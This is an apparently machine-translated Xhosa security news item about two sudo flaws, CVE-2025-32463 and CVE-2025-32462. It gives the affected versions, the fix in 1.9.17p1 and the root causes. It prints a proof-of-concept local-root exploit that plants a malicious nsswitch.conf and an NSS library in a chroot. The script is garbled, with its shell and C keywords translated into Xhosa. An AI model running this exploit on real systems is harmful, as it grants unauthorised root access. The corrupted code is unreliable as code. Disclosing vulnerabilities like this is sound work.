Kufunyenwe ubuthathaka (CVE-2025-32463) kwiphakheji ye-sudo, esetyenziselwa ukwenza imiyalelo egameni labanye abasebenzisi. Olu buthathaka luvumela nawuphi na umsebenzisi ongenamalungelo ukuba asebenzise ikhowudi ene-root privileges, nokuba umsebenzisi akachazwanga kulungiselelo lwe-sudoers. Ukusasazwa okusebenzisa ifayile yoqwalaselo lwe-/etc/nsswitch.conf kubuthathaka kule ngxaki. Umzekelo, ukusetyenziswa kobuthathaka kuboniswe kwi Ubuntu 24.04 kunye neFedora 41.
Ubungonakali buchaphazela uqwalaselo oluzenzekelayo kwaye buqinisekiswa kwiinguqulelo ze-sudo 1.9.14 ukuya kwi-1.9.17 (ezinokuthi zichaphazele zonke iinguqulelo ukusukela kwi-1.8.33). Ingxaki ilungisiwe kwi-sudo 1.9.17p1. Ungajonga imeko yenguqulelo entsha yephakheji okanye ukulungiswa kwepetshi yosasazo lwakho kula maphepha alandelayo (ukuba iphepha alifumaneki, abaphuhlisi bosasazo abakaqali ukuphanda ingxaki): Debian, Ubuntu, iFedora, iSUSE/openSUSE, iRHEL, iGentoo kunye neArch (1, 2).
Ingxaki ibangelwa kukuba xa usebenzisa i -R (--chroot) ukhetho lokusebenzisa imiyalelo kwindawo yechroot kunye nolawulo lweengcambu ezikhethiweyo ngumsebenzisi, ifayile /etc/nsswitch.conf ilayishwe kumxholo wolawulo lweengcambu ezintsha, hayi inkqubo yolawulo. Kuba umsebenzisi unokusebenzisa ulawulo lwakhe njengolawulo lweengcambu zechroot, unokubeka ifayile yoqwalaselo nsswitch.conf kuyo. Ngokulawula ifayile /etc/nsswitch.conf elayishwe yi-NSS (Name Service Switch) isistim esezantsi, umsebenzisi unokongeza izicwangciso kuyo ezibangela ukuba kubizwe abaphathi abongezelelweyo. Aba baphathi balayishwa yi-NSS ngohlobo lwamathala eencwadi ekwabelwana ngawo, nawo anokubekwa kuluhlu olulawulwa ngumsebenzisi. Ngokufakela eyakhe ithala leencwadi, umsebenzisi unokufezekisa ukuphunyezwa kwekhowudi kuyo ngamalungelo engcambu, ekubeni ukusetyenzwa kwe-NSS kwenziwa ngaphambi kokuba amalungelo alahlwe.
Umzekelo wokuxhaphaza: #!/bin/bash STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX) cd ${STAGE?} || phuma kwikati eyi-1 > woot1337.c< #zibandakanya __attribute__((umakhi)) void woot(engekho) { setreuid(0,0); i-setregid(0,0); chdir("/"); execl("/umgqomo/bash", "/umgqomo/bash", NULL); } EOF mkdir -p woot/etc libnss_ echo "passwd: /woot1337" > woot/etc/nsswitch.conf cp /etc/group woot/etc gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337woot! sudo -R woot woot rm -rf ${ STAGE?}
I-Sudo 1.9.17p1 iphinda ilungise obunye ubuthathaka (CVE-2025-32462) evumela ukuphumeza imiyalelo ngamalungelo eengcambu, kodwa ibonakala kuphela kuqwalaselo lwe-sudoers apho iparamitha "yenginginya" isetelwe ixabiso elingeyiyo LONKE okanye igama lenginginya langoku. Ukuba sesichengeni kubangelwa yimpazamo ngenxa yokuba ukhetho "-h" ("--host") lusebenze kungekuphela nje ngokudityaniswa no "-l" ("--list") ukhetho lokubonisa amalungelo awodwa omamkeli, kodwa naxa usebenzisa imiyalelo. Ke, umsebenzisi unokuxela nawuphi na umamkeli xa efowunela i-sudo kwaye adlule kwizithintelo zemithetho ye-sudoers ebotshelelwe kwigama lenginginya.
Ukuze uhlaselo lwenziwe, umsebenzisi kufuneka adweliswe kwi-sudoers, umzekelo, ukuba useto luthi "testuser testhost = BONKE", emva koko umsebenzisi "testhost" angachaza "sudo -h testhost" kwaye aqhube imiyalelo ngamalungelo engcambu kuyo nayiphi na inginginya, hayi kuphela kumamkeli wovavanyo. Ulungelelwaniso olunezicwangciso ezinje ngo "testuser ZONKE = ZONKE" okanye ngaphandle kwemithetho ecacileyo yomsebenzisi othile akukho sichengeni.
umthombo: opennet.ru
